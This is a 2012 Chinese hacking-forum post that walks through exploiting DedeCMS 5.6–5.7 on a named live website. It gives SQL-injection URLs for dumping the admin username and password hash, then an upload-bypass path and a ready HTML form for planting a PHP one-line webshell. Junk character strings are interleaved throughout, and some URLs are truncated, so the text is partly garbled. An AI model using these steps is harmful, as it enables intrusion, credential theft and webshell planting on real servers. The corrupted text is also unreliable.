找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2921|回复: 0
打印 上一主题 下一主题

dedecms5.6-5.7注入与上传漏洞利用

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 10:56:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
①注入漏洞。
, Y* s# K/ [- l3 N这站 http://www.political-security.com/; A0 [5 P( h2 R8 g$ p
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
1 q. Z) z  n, g9 Q. v: \/ o+ p% Swww.political-security.com/data/mysql_error_trace.inc 爆后台7 ]( G( ?8 A# c, T, M
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。$ G. l8 W/ V+ M3 k; ~4 g# ^% w
然后写上语句 7 j) h4 I2 z) ?6 D' e: B4 p
查看管理员帐号
7 H% b7 o+ b' f0 Ahttp://www.political-security.co ... &membergroup=@`, f' `1 \, M8 T2 b/ Y* B- \

/ a, p  w0 |& _admin . t, B" _1 @( B

5 Q, E1 ~% f0 r# w* E查看管理员密码' ~$ \  l) Z0 U8 H$ Y+ c! w" D% H
 http://www.political-security.co ... &membergroup=@`* z$ E) o; X' h6 T
3 q1 F- e, x+ r- L: c# K
8d29b1ef9f8c5a5af4291 h$ t) {* d; y8 k! j/ Y

: t9 w& m4 K& j" B查看管理员密码
. N) b6 V. Q8 t8 D; P. p1 W4 F$ ^/ l& P
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5; a6 }2 F- S% s

" ~- ]2 d2 u: A& M# U8d2
9 K# p! Q% q& ]  N2 Y- m, q9b1ef9f8c5a5af42- p# u* Q1 |! {9 _8 Y6 j
9# `# }: A4 t- q6 S0 @, h3 r
  x# {) s7 B* w, s, K# p
cmd5没解出来 只好测试第二个方法1 R8 Q6 m) S8 R- Y
4 o( S, E- b0 K+ _
. h$ j1 H' }! d" z
②上传漏洞:
! g2 c* s( E0 l4 q3 j8 `7 B2 ]' l$ T! e; d
  I$ y# w, z# I6 n2 M8 u3 @只要登陆会员中心,然后访问页面链接
9 T9 W6 A( K; c9 S' T2 l" j" w, ]( H“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”3 L! ~$ [: ^& b" a2 m

  F( e: H3 a- l如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”1 T, v. ~: u5 d6 `

1 w+ y  v- {3 s, E: U1 m于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm6 N+ |$ B8 m0 Y% i9 V
8 @* O. `, R% R) M3 e6 B5 r! B
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
/ N0 J4 B! U$ t或者
5 J6 m% A1 h7 o2 i$ a. {即可上传成功
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表